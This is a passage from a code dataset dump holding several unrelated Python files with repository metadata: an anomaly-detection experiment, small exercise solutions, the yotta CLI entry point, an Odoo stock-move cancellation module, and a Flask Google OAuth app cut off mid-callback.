\"Hz_100\"]):\n if apply_fft:\n x_temp = FFT_Sensor().transform(data_raw[key])\n else:\n x_temp = np.copy(data_raw[key])\n x_resampled_ = Resample_Sensor_Fourier().transform(\n x_temp, seq_len=resample_factor, seq_axis=seq_xis\n )\n # x_resampled_ = Resample_Sensor().transform(\n # x_temp,\n # n=resample_maps[key][\"n\"],\n # seq_axis=seq_xis,\n # mode=resample_maps[key][\"mode\"],\n # )\n if id_ == 0:\n x_resampled = x_resampled_\n else:\n x_resampled = np.concatenate(\n (x_resampled, x_resampled_), axis=sensor_xis\n )\n exp_man.encode_pickle(pickle_x_rs, data=x_resampled)\n else:\n x_resampled = exp_man.load_encoded_pickle(pickle_x_rs)\n\n # select sensors\n if isinstance(sensor_i, int):\n x_resampled_select = x_resampled[:, [sensor_i]]\n else:\n x_resampled_select = x_resampled[:, sensor_i]\n y_target = np.copy(data_raw[\"target\"])\n\n # split inliers and outliers\n # get the y_arg_ood where only target dim is faulty,\n # and all other dims are healthy\n\n y_arg_ood = np.argwhere(\n (y_target[:, target_dim] > 0)\n & (y_target[:, [i for i in range(4) if i != target_dim]].sum(1) == 0)\n )[:, 0]\n x_inliers = x_resampled_select[np.argwhere(y_target[:, target_dim] == 0)[:, 0]]\n x_outliers = x_resampled_select[y_arg_ood]\n\n x_id_train, x_id_test = train_test_split(\n x_inliers, random_state=random_seed, shuffle=True, train_size=0.70\n )\n x_ood_test = x_outliers\n\n # === MIN MAX SCALER ===\n min_max_clip = True\n sensor_scaler = MinMaxSensor(\n num_sensors=x_id_train.shape[1], axis=1, clip=min_max_clip\n )\n x_id_train = sensor_scaler.fit_transform(x_id_train)\n x_id_test = sensor_scaler.transform(x_id_test)\n x_ood_test = sensor_scaler.transform(x_ood_test)\n\n # ===============FIT BAE===============\n use_cuda = True\n weight_decay = 0.00000000001\n anchored = True if bae_type == \"ens\" else False\n bias = False\n se_block = False\n norm = \"none\"\n self_att = False\n self_att_transpose_only = False\n num_epochs = 100\n activation = \"leakyrelu\"\n lr = 0.001\n\n input_dim = x_id_train.shape[-1]\n latent_dim = int(np.product(x_id_train.shape[1:]) * latent_factor)\n\n chain_params = [\n {\n \"base\": \"conv1d\",\n \"input_dim\": input_dim,\n \"conv_channels\": [x_id_train.shape[1], 10, 20],\n \"conv_stride\": [2, 2],\n \"conv_kernel\": [5, 2],\n \"activation\": activation,\n \"norm\": norm,\n \"se_block\": se_block,\n \"order\": [\"base\", \"norm\", \"activation\"],\n \"bias\": bias,\n \"last_norm\": norm,\n },\n {\n \"base\": \"linear\",\n # \"architecture\": [latent_dim, latent_dim // 2],\n # \"architecture\": [500, latent_dim],\n \"architecture\": [250, latent_dim],\n \"activation\": activation,\n \"norm\": norm,\n \"last_norm\": norm,\n },\n ]\n\n bae_model = bae_type_classes[bae_type](\n chain_params=chain_params,\n last_activation=\"sigmoid\",\n last_norm=norm,\n twin_output=twin_output,\n twin_params={\"activation\": \"selu\", \"norm\": \"none\"},\n skip=skip,\n use_cuda=use_cuda,\n scaler_enabled=False,\n homoscedestic_mode=homoscedestic_mode,\n likelihood=likelihood,\n weight_decay=weight_decay,\n num_samples=n_bae_samples,\n anchored=anchored,\n learning_rate=lr,\n stochastic_seed=random_seed,\n )\n\n x_id_train_loader = convert_dataloader(\n x_id_train, batch_size=len(x_id_train) // 5, shuffle=True, drop_last=True\n )\n\n min_lr, max_lr, half_iter = run_auto_lr_range_v4(\n x_id_train_loader,\n bae_model,\n window_size=1,\n num_epochs=10,\n run_full=False,\n plot=False,\n verbose=False,\n save_mecha=\"copy\" if bae_type == \"vae\" else \"file\",\n )\n\n if isinstance(bae_model, BAE_SGHMC):\n bae_model.fit(\n x_id_train_loader,\n burn_epoch=int(num_epochs * 2 / 3),\n sghmc_epoch=num_epochs // 3,\n clear_sghmc_params=True,\n )\n else:\n time_method(bae_model.fit, x_id_train_loader, num_epochs=num_epochs)\n\n # === PREDICTIONS ===\n exp_man = ExperimentManager(folder_name=\"experiments\")\n\n # predict and evaluate\n (bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n ) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=eval_ood_unc,\n exp_man=exp_man,\n ret_flatten_nll=False,\n )\n\n # eval per sensor\n nll_key = \"nll\"\n sensor_aurocs_ = {}\n for i in range(x_inliers.shape[sensor_xis]):\n e_nll_id_ = flatten_nll(bae_id_pred[nll_key].mean(0)[:, [i]])\n e_nll_ood_ = flatten_nll(bae_ood_pred[nll_key].mean(0)[:, [i]])\n\n sensor_aurocs_.update({str(i): calc_auroc(e_nll_id_, e_nll_ood_)})\n\n # save eval per sensor\n pickle_sensor_auroc = exp_man.encode(exp_params)\n exp_man.update_csv(\n exp_params,\n insert_pickle=pickle_sensor_auroc,\n csv_name=sensor_auroc_filename,\n )\n exp_man.encode_pickle(pickle_sensor_auroc, data=sensor_aurocs_)\n\n print(eval_auroc)\n\n # eval per level of ood\n e_nll_id = flatten_nll(bae_id_pred[nll_key]).mean(0)\n e_nll_ood = flatten_nll(bae_ood_pred[nll_key]).mean(0)\n v_nll_id = flatten_nll(bae_id_pred[nll_key]).var(0)\n v_nll_ood = flatten_nll(bae_ood_pred[nll_key]).var(0)\n\n y_ood_levels = np.unique(y_target[y_arg_ood, target_dim]).astype(int)\n for level in y_ood_levels:\n e_ood_level = e_nll_ood[\n np.argwhere(y_target[y_arg_ood, target_dim] == level)[:, 0]\n ]\n v_ood_level = v_nll_ood[\n np.argwhere(y_target[y_arg_ood, target_dim] == level)[:, 0]\n ]\n auroc_levels = {\n \"OOD_LEVEL\": level,\n \"E_AUROC\": calc_auroc(e_nll_id, e_ood_level),\n \"V_AUROC\": calc_auroc(v_nll_id, v_ood_level),\n }\n exp_man.update_csv(\n exp_man.concat_params_res(exp_params, auroc_levels),\n csv_name=ood_level_auroc_filename,\n )\n print(auroc_levels)\n\n\n# CALCULATE OUTLIER PROBA\n\nbae_id_pred_y_mu = bae_model.predict(x_id_test, select_keys=[\"y_mu\"])[\"y_mu\"]\nbae_ood_pred_y_mu = bae_model.predict(x_ood_test, select_keys=[\"y_mu\"])[\"y_mu\"]\n\nbae_id_pred_y_sigma = np.sqrt(\n bae_model.predict(x_id_test, select_keys=[\"y_sigma\"])[\"y_sigma\"]\n)\nbae_ood_pred_y_sigma = np.sqrt(\n bae_model.predict(x_ood_test, select_keys=[\"y_sigma\"])[\"y_sigma\"]\n)\n\n\n# bae_id_pred_y_mu[0]\n# convert to outlier proba\n\nfrom scipy.special import erf\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\ndef cdf_normal(x, mu, sigma=1, scale=True):\n res = norm.cdf(x, loc=mu, scale=sigma)\n\n if scale:\n # pc_wise\n res = np.piecewise(\n res,\n [\n x - mu < 0,\n x - mu >= 0,\n ],\n [lambda x_: (1 - x_ - 0.5) * 2, lambda x_: (x_ - 0.5) * 2],\n )\n\n return res\n\n\n# cdf_res = cdf_normal(\n# x=flatten_np(x_id_test)[:, :-1],\n# mu=flatten_np(bae_id_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_id_pred_y_sigma[0])[:, :-1],\n# )\n#\n# cdf_id_res = cdf_normal(\n# x=flatten_np(x_id_test)[:, :-1],\n# mu=flatten_np(bae_id_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_id_pred_y_sigma[0])[:, :-1],\n# )\n#\n# cdf_ood_res = cdf_normal(\n# x=flatten_np(x_ood_test)[:, :-1],\n# mu=flatten_np(bae_ood_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_ood_pred_y_sigma[0])[:, :-1],\n# )\n#\n\ndef calc_ood_proba(x_test, bae_model):\n bae_pred = bae_model.predict(x_test, select_keys=[\"y_mu\", \"y_sigma\"])\n bae_pred_y_mu = bae_pred[\"y_mu\"]\n\n if bae_model.likelihood == \"gaussian\" and bae_model.homoscedestic_mode ==\"none\" and bae_model.twin_output==False:\n bae_pred_y_sigma = 1\n homo_gauss = True\n else:\n bae_pred_y_sigma = np.sqrt(bae_pred[\"y_sigma\"])\n homo_gauss = False\n return np.array(\n [\n cdf_normal(\n x=flatten_np(x_test)[:, :-1],\n mu=flatten_np(bae_pred_y_mu[i])[:, :-1],\n sigma=flatten_np(bae_pred_y_sigma[i])[:, :-1] if not homo_gauss else bae_pred_y_sigma,\n # sigma=bae_pred_y_sigma[i][:-1]\n )\n for i in range(bae_model.num_samples)\n ]\n )\n\n\n# y_id_proba = calc_ood_proba(x_id_test, bae_model).prod(-1)\n# y_ood_proba = calc_ood_proba(x_ood_test, bae_model).prod(-1)\ny_id_proba = calc_ood_proba(x_id_test, bae_model).mean(-1)\ny_ood_proba = calc_ood_proba(x_ood_test, bae_model).mean(-1)\n\ndef calc_unc_probas(y_probas):\n epi = y_probas.var(0)\n alea = (y_probas*(1-y_probas)).mean(0)\n total = epi+alea\n unc_probas = {\"epi\":epi, \"alea\":alea, \"total\":total}\n return unc_probas\n\n\n# unc_id_level = cdf_id_res.mean(-1) * (1 - cdf_id_res.mean(-1)) * 4\n# unc_ood_level = cdf_ood_res.mean(-1) * (1 - cdf_ood_res.mean(-1)) * 4\n\n# unc_type = \"total\"\nunc_type = \"epi\"\nunc_id_level = calc_unc_probas(y_id_proba)[unc_type]*4\nunc_ood_level = calc_unc_probas(y_ood_proba)[unc_type]*4\n\nall_aurocs = []\nall_perc = []\nfor unique_ in np.unique(np.concatenate((unc_id_level, unc_ood_level))):\n# for unique_ in np.histogram(np.unique(np.concatenate((unc_id_level, unc_ood_level))), bins=50)[1]:\n# for unique_ in np.unique(np.concatenate((unc_id_level, unc_ood_level)).round(3)):\n retained_id_arg = np.argwhere(unc_id_level <= unique_)[:, 0]\n retained_ood_arg = np.argwhere(unc_ood_level <= unique_)[:, 0]\n\n if len(retained_id_arg) >= 3 and len(retained_ood_arg) >= 3:\n aurc_ = calc_auroc(e_nll_id[retained_id_arg], e_nll_ood[retained_ood_arg])\n all_aurocs.append(aurc_)\n all_perc.append(\n (len(retained_id_arg) + len(retained_ood_arg))\n / (len(e_nll_id) + len(e_nll_ood))\n )\n\nplt.figure()\nplt.plot(all_perc, all_aurocs)\n\n\n\n# predict and evaluate\n(bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=True,\n exp_man=exp_man,\n ret_flatten_nll=False,\n norm_scalings=[False],\n cdf_dists=[\"norm\"],\n)\n\n(bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=True,\n exp_man=exp_man,\n ret_flatten_nll=False,\n norm_scalings=[True],\n cdf_dists=[\"norm\"],\n)\n\nplt.figure()\nplt.plot(\n retained_res_all[\"varnll\"][\"valid_perc\"],\n retained_res_all[\"varnll\"][\"auroc\"],\n)\n\nplt.figure()\nplt.plot(\n retained_res_all[\"proba-total\"][\"valid_perc\"],\n retained_res_all[\"proba-total\"][\"auroc\"],\n)\n","repo_name":"bangxiangyong/bae-anomaly-uncertainty","sub_path":"zema_hydraulic/05-Outlier-proba.py","file_name":"05-Outlier-proba.py","file_ext":"py","file_size_in_byte":18200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"12185730567","text":"\"\"\"\n 2022/12/10 author:WH\n\"\"\"\n\nclass Solution:\n def countBits(self, n):\n i = 0\n ans = []\n while i < n+1:\n ans.append(self.CountNum(i))\n i += 1\n return ans\n\n\n def CountNum(self, num):\n res = 0\n while num:\n num &= (num-1)\n res += 1\n return res\n\nif __name__ == \"__main__\":\n n = 5\n result = Solution().countBits(n)\n print(result)","repo_name":"Sirwenhao/Leetcode_solution","sub_path":"Python_Solution/easy/leetcode_0388.py","file_name":"leetcode_0388.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"43132052618","text":"#!/usr/bin/python3\n\"\"\"\nThis module has one function that sum of an integer or float as an interger\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n Return the sum of an integer or float as an interger\n\n Args:\n a: int or float\n b: int or float\n\n Return:\n Sum of the two arguments as an integer\n\n Raises:\n TypeError: if arg a or arg b is not an integer or a float\n \"\"\"\n if isinstance(a, int) != True and isinstance(a, float) != True:\n raise TypeError(\"a must be an integer\")\n\n if isinstance(b, int) != True and isinstance(b, float) != True:\n raise TypeError(\"b must be an integer\")\n\n return int(a) + int(b)\n","repo_name":"AbdulRaufAl-hassan101010/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41309163427","text":"import time\nimport ntplib\nt = (2018, 3, 11, 19, 3, 38, 1, 48, 0)\nc = ntplib.NTPClient()\nresponse = c.request('time4.google.com', version=3) \nsecs = response.tx_time\nprint(\"de ntp\", response.tx_time)\nprint(\"de time clock\", time.clock())\nfor i in range(10):\n print (\"time.mktime(t) : \", secs)\n tempTime=time.asctime(time.localtime(secs+time.clock()))\n print (\"asctime(localtime(secs)): %s\" % tempTime[0:4]+tempTime[8:10]+\"/\"+tempTime[4:6]+\"/\"+tempTime[20:24], tempTime[11:19])\n time.sleep(1)","repo_name":"SeekingAura/distribuidosUTP","sub_path":"taller 7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23657273072","text":"from yotta.lib import lazyregex #pylint: disable=unused-import\nfrom yotta.lib import errors #pylint: disable=unused-import\n\n# NOTE: argcomplete must be first!\n# argcomplete, pip install argcomplete, tab-completion for argparse, Apache-2\nimport argcomplete\n\n# standard library modules, , ,\nimport argparse\nimport sys\nimport os\n\n# globalconf, share global arguments between modules, internal\nimport yotta.lib.globalconf as globalconf\n\n# hook to support coverage information when yotta runs itself during tests:\nif 'COVERAGE_PROCESS_START' in os.environ:\n import coverage\n coverage.process_startup()\n\n# set __version__ using the same file that's read by setup.py when installing:\nwith open(os.path.join(os.path.dirname(__file__), 'version.txt')) as _version_f:\n __version__ = _version_f.read().strip()\n\ndef splitList(l, at_value):\n r = [[]]\n for x in l:\n if x == at_value:\n r.append(list())\n else:\n r[-1].append(x)\n return r\n\ndef _handleUnhandledReqestExceptions(fn):\n import functools\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n # requests, apache2\n import requests\n try:\n return fn(*args, **kwargs)\n except requests.exceptions.RequestException as e:\n import logging\n if e.request is not None:\n logging.critical('%s %s failed with status %s', e.request.method, e.request.url, e.response.status_code)\n sys.exit(1)\n else:\n raise\n return wrapped\n\ndef _exitSilentlyOnUnhandledPipeError(fn):\n import functools\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except IOError as e:\n import errno\n if e.errno == errno.EPIPE:\n # unhandled pipe error -> exit silently, but with an error code\n sys.exit(1)\n else:\n raise\n return wrapped\n\n@_exitSilentlyOnUnhandledPipeError\n@_handleUnhandledReqestExceptions\ndef main():\n # standard library modules, , ,\n import logging\n from functools import reduce\n\n # logging setup, , setup the logging system, internal\n from yotta.lib import logging_setup\n # options, , common argument parser options, internal\n import yotta.options as options\n\n logging_setup.init(level=logging.INFO, enable_subsystems=None, plain=False)\n\n # we override many argparse things to make options more re-usable across\n # subcommands, and allow lazy loading of subcommand modules:\n parser = options.parser.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n description='Build software using re-usable components.\\n'+\n 'For more detailed help on each subcommand, run: yotta --help'\n )\n subparser = parser.add_subparsers(dest='subcommand_name', metavar='')\n\n parser.add_argument('--version', action='version', version=__version__,\n help='display the version'\n )\n\n # add re-usable top-level options which subcommands may also accept\n options.verbosity.addTo(parser)\n options.debug.addTo(parser)\n options.plain.addTo(parser)\n options.noninteractive.addTo(parser)\n options.registry.addTo(parser)\n options.target.addTo(parser)\n options.config.addTo(parser)\n\n def addParser(name, module_name, description, help=None):\n if help is None:\n help = description\n def onParserAdded(parser):\n import importlib\n module = importlib.import_module('.' + module_name, 'yotta')\n module.addOptions(parser)\n parser.set_defaults(command=module.execCommand)\n subparser.add_parser_async(\n name, description=description, help=help,\n formatter_class=argparse.RawTextHelpFormatter,\n callback=onParserAdded\n )\n\n addParser('search', 'search',\n 'Search for open-source modules and targets that have been published '+\n 'to the yotta registry (with yotta publish). See help for `yotta '+\n 'install` for installing modules, and for `yotta target` for '+\n 'switching targets.',\n 'Search for published modules and targets'\n )\n addParser('init', 'init', 'Create a new module.')\n addParser('install', 'install',\n 'Add a specific module as a dependency, and download it, or install all '+\n 'dependencies for the current module. Use yotta install '+\n 'modulename@version to install a specific version.'\n )\n addParser('build', 'build',\n 'Build the current module. Options can be passed to the underlying '+\n 'build tool by passing them after --, e.g. to do a verbose build '+\n 'which will display each command as it is run, use:\\n'+\n ' yotta build -- -v\\n\\n'+\n 'The programs or libraries to build can be specified (by default '+\n 'only the libraries needed by the current module and the current '+\n \"module's own tests are built). For example, to build the tests of \"+\n 'all dependencies, run:\\n yotta build all_tests\\n\\n',\n 'Build the current module.'\n )\n addParser('version', 'version', 'Bump the module version, or (with no arguments) display the current version.')\n addParser('link', 'link',\n 'Symlink a module to be used into another module.\\n\\n'+\n 'Use: \"yotta link\" in a module to link it globally, then use \"yotta '+\n 'link \" to link it into the module where you want to use '+\n 'it.\\n\\n'+\n '\"yotta link ../path/to/module\" is also supported, which will create '+\n 'the global link and a link into the current module in a single step.',\n 'Symlink a module'\n )\n addParser('link-target', 'link_target',\n 'Symlink a target to be used into another module.\\n\\n'+\n 'Use: \"yotta link\" in a target to link it globally, then use \"yotta '+\n 'link-target \" to link it into the module where you want to use '+\n 'it.\\n\\n'+\n '\"yotta link ../path/to/target\" is also supported, which will create '+\n 'the global link and a link into the current module in a single step.',\n 'Symlink a target'\n )\n addParser('update', 'update', 'Update dependencies for the current module, or a specific module.')\n addParser('target', 'target', 'Set or display the target device.')\n addParser('debug', 'debug', 'Attach a debugger to the current target. Requires target support.')\n addParser('test', 'test_subcommand',\n 'Run the tests for the current module on the current target. A build '+\n 'will be run first, and options to the build subcommand are also '+\n 'accepted by test.\\nThis subcommand requires the target to provide a '+\n '\"test\" script that will be used to run each test. Modules may also '+\n 'define a \"testReporter\" script, which will be piped the output from '+\n 'each test, and may produce a summary.',\n 'Run the tests for the current module on the current target. Requires target support for cross-compiling targets.'\n )\n addParser('start', 'start',\n 'Launch the compiled program (available for executable modules only). Requires target support for cross-compiling targets.'\n )\n addParser('publish', 'publish', 'Publish a module or target to the public registry.')\n addParser('unpublish', 'unpublish', 'Un-publish a recently published module or target.')\n addParser('login', 'login', 'Authorize for access to private github repositories and publishing to the yotta registry.')\n addParser('logout', 'logout', 'Remove saved authorization token for the current user.')\n addParser('whoami', 'whoami', 'Display who the currently logged in user is (if any).')\n addParser('list', 'list', 'List the dependencies of the current module, or the inherited targets of the current target.')\n addParser('outdated', 'outdated', 'Display information about dependencies which have newer versions available.')\n addParser('uninstall', 'uninstall', 'Remove a specific dependency of the current module, both from module.json and from disk.')\n addParser('remove', 'remove',\n 'Remove the downloaded version of a dependency module or target, or '+\n 'un-link a linked module or target (see yotta link --help for details '+\n 'of linking). This command does not modify your module.json file.',\n 'Remove or unlink a dependency without removing it from module.json.'\n )\n addParser('owners', 'owners', 'Add/remove/display the owners of a module or target.')\n addParser('licenses', 'licenses', 'List the licenses of the current module and its dependencies.')\n addParser('clean', 'clean', 'Remove files created by yotta and the build.')\n addParser('config', 'config', 'Display the target configuration info.')\n addParser('shrinkwrap', 'shrinkwrap', 'Create a yotta-shrinkwrap.json file to freeze dependency versions.')\n\n # short synonyms, subparser.choices is a dictionary, so use update() to\n # merge in the keys from another dictionary\n short_commands = {\n 'up':subparser.choices['update'],\n 'in':subparser.choices['install'],\n 'un':subparser.choices['uninstall'],\n 'ln':subparser.choices['link'],\n 'v':subparser.choices['version'],\n 'ls':subparser.choices['list'],\n 'rm':subparser.choices['remove'],\n 'unlink':subparser.choices['remove'],\n 'unlink-target':subparser.choices['remove'],\n 'owner':subparser.choices['owners'],\n 'lics':subparser.choices['licenses'],\n 'who':subparser.choices['whoami'],\n 'run':subparser.choices['start']\n }\n subparser.choices.update(short_commands)\n\n # split the args into those before and after any '--'\n # argument - subcommands get raw access to arguments following '--', and\n # may pass them on to (for example) the build tool being used\n split_args = splitList(sys.argv, '--')\n following_args = reduce(lambda x,y: x + ['--'] + y, split_args[1:], [])[1:]\n\n # complete all the things :)\n argcomplete.autocomplete(\n parser,\n exclude = list(short_commands.keys()) + ['-d', '--debug', '-v', '--verbose']\n )\n\n # when args are passed directly we need to strip off the program name\n # (hence [:1])\n args = parser.parse_args(split_args[0][1:])\n\n # set global arguments that are shared everywhere and never change\n globalconf.set('interactive', args.interactive)\n globalconf.set('plain', args.plain)\n\n # finally, do stuff!\n if 'command' not in args:\n parser.print_usage()\n sys.exit(0)\n\n try:\n status = args.command(args, following_args)\n except KeyboardInterrupt:\n logging.warning('interrupted')\n status = -1\n except Exception as e:\n logging.error(e)\n status = -1\n\n sys.exit(status or 0)\n","repo_name":"ARMmbed/yotta","sub_path":"yotta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10973,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"37"} +{"seq_id":"4091923975","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, _\nfrom odoo.exceptions import UserError\nfrom odoo.tools.float_utils import float_round, float_compare\n\nclass StockMoveCancel(models.Model):\n _inherit = 'stock.move'\n\n def _action_cancel(self):\n if any(move.state == 'done' for move in self):\n for move in self:\n if move.state == 'cancel':\n continue\n move.mapped('move_line_ids')._action_cancel_done()\n move.write({'state': 'cancel', 'date': fields.Datetime.now()})\n else:\n super(StockMoveCancel, self)._action_cancel()\n return True\n\n def _action_set_to_draft(self):\n if any(move.state == 'cancel' for move in self):\n for move in self:\n move.write({'state': 'draft'})\n\nclass StockMoveLineCancel(models.Model):\n _inherit = 'stock.move.line'\n\n def _action_cancel_done(self):\n Quant = self.env['stock.quant']\n ml_to_delete = self.env['stock.move.line']\n for ml in self:\n uom_qty = float_round(ml.qty_done, precision_rounding=ml.product_uom_id.rounding, rounding_method='HALF-UP')\n precision_digits = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n qty_done = float_round(ml.qty_done, precision_digits=precision_digits, rounding_method='HALF-UP')\n qty_done_float_compared = float_compare(ml.qty_done, 0, precision_rounding=ml.product_uom_id.rounding)\n if qty_done_float_compared > 0:\n if ml.product_id.tracking != 'none':\n picking_type_id = ml.move_id.picking_type_id\n if picking_type_id:\n if picking_type_id.use_create_lots:\n if ml.lot_name and not ml.lot_id:\n lot = self.env['stock.production.lot'].create(\n {'name': ml.lot_name, 'product_id': ml.product_id.id}\n )\n ml.write({'lot_id': lot.id})\n elif not picking_type_id.use_create_lots and not picking_type_id.use_existing_lots:\n continue\n elif ml.move_id.inventory_id:\n continue\n elif qty_done_float_compared < 0:\n raise UserError(_('No negative quantities allowed'))\n else:\n ml_to_delete |= ml\n ml_to_delete.unlink()\n done_ml = self.env['stock.move.line']\n for ml in self - ml_to_delete:\n if ml.product_id.type == 'product':\n rounding = ml.product_uom_id.rounding\n if not ml.location_dest_id.should_bypass_reservation() and float_compare(ml.qty_done, ml.product_qty, precision_rounding=rounding) > 0:\n extra_qty = ml.qty_done - ml.product_qty\n ml._free_reservation(ml.product_id, ml.location_dest_id, extra_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id, ml_to_ignore=done_ml)\n if not ml.location_dest_id.should_bypass_reservation() and ml.product_id.type == 'product' and ml.product_qty:\n try:\n Quant._update_reserved_quantity(ml.product_id, ml.location_dest_id, -ml.product_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n except UserError:\n Quant._update_reserved_quantity(ml.product_id, ml.location_dest_id, -ml.product_qty, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n quantity = ml.product_uom_id._compute_quantity(ml.qty_done, ml.move_id.product_id.uom_id, rounding_method='HALF-UP')\n available_qty, in_date = Quant._update_available_quantity(ml.product_id, ml.location_dest_id, -quantity, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id)\n if available_qty < 0 and ml.lot_id:\n untracked_qty = Quant._get_available_quantity(ml.product_id, ml.location_dest_id, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n if untracked_qty:\n taken_from_untracked_qty = min(untracked_qty, abs(quantity))\n Quant._update_available_quantity(ml.product_id, ml.location_dest_id, -taken_from_untracked_qty, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id)\n Quant._update_available_quantity(ml.product_id, ml.location_dest_id, taken_from_untracked_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id)\n Quant._update_available_quantity(ml.product_id, ml.location_id, quantity, lot_id=ml.lot_id, package_id=ml.result_package_id, owner_id=ml.owner_id, in_date=in_date)\n done_ml |= ml\n (self - ml_to_delete).with_context(bypass_reservation_update=True).write({\n 'product_uom_qty': 0.00,\n 'qty_done': 0.00,\n 'date': fields.Datetime.now(),\n })","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/stock_picking_cancel/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43495135368","text":"from flask import Flask, render_template, request, jsonify, url_for, session, redirect\nimport flask\nfrom time import time\nfrom oauthlib.oauth2 import WebApplicationClient\nimport requests\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\nfrom utils import extractIds\nfrom copier import Copier\nfrom json import dumps\nfrom config import Config\nfrom database import db\nfrom flask_migrate import Migrate\n\n\nACCESS_TOKEN = 'access_token'\nSTATE = 'state'\nEXPIRES_AT = 'expires_at'\nEXPIRES_IN = 'expires_in'\nEMAIL = 'email'\nID_TOKEN = 'id_token'\nREFRESH_TOKEN = 'refresh_token'\nSUB = 'sub'\n\n\napp = Flask(__name__, static_url_path='/static')\napp.config.from_object(Config)\napp.secret_key = app.config['SECRET_KEY']\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {\"pool_pre_ping\": True}\nclient = WebApplicationClient(app.config['CLIENT_ID'])\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\nfrom user import User\n\n\ndef get_google_provider_cfg():\n return requests.get(app.config['GOOGLE_DISCOVERY_URL']).json()\n\n\ndef is_logged_in():\n return SUB in session\n\n\ndef has_refresh_token():\n return session.get(REFRESH_TOKEN, None)\n\n\ndef is_token_valid():\n if session[EXPIRES_AT]:\n return time() < session[EXPIRES_AT]\n else:\n return False\n\n\n@app.route('/')\ndef home():\n if is_logged_in():\n if is_token_valid():\n return render_template('drive.html')\n else:\n if has_refresh_token():\n return flask.redirect(url_for('refresh'), code=302)\n else:\n return render_template('login.html')\n else:\n return render_template('login.html')\n\n\n@app.route('/login')\ndef login():\n google_provider_cfg = get_google_provider_cfg()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n url, headers, body = client.prepare_authorization_request(\n authorization_endpoint,\n redirect_url=app.config['AUTH_REDIRECT_URI'],\n scope=app.config['AUTHORIZATION_SCOPE'],\n access_type='offline'\n )\n\n session[STATE] = client.state\n return redirect(url)\n\n\n@app.route('/refresh')\ndef refresh():\n assert(is_logged_in())\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n\n url, headers, body = client.prepare_refresh_token_request(token_endpoint,\n client_id=app.config['CLIENT_ID'],\n client_secret=app.config['CLIENT_SECRET'],\n refresh_token=session[REFRESH_TOKEN],\n )\n\n token_response = requests.post(url,\n headers=headers,\n data=body)\n\n access_token = token_response.json()[ACCESS_TOKEN]\n expires_at = token_response.json()[EXPIRES_IN] + int(time())\n User.update_token(session[SUB], access_token, expires_at)\n session[ACCESS_TOKEN] = access_token\n session[EXPIRES_AT] = expires_at\n return redirect(app.config['BASE_URI'])\n\n\n@app.route('/callback')\ndef callback():\n response_state = request.args.get(STATE, default=None, type=None)\n\n if response_state != flask.session[STATE]:\n response = flask.make_response('Invalid state parameter', 401)\n return response\n\n code = request.args.get(\"code\")\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n url, headers, body = client.prepare_token_request(token_endpoint,\n # authorization_response=new_auth,\n redirect_url=app.config['AUTH_REDIRECT_URI'],\n code=code,\n client_secret=app.config['CLIENT_SECRET']\n )\n\n token_response = requests.post(url,\n headers=headers,\n data=body)\n\n expires_at = token_response.json()[EXPIRES_IN] + int(time())\n\n client.parse_request_body_response(dumps(token_response.json()))\n\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n\n sub = 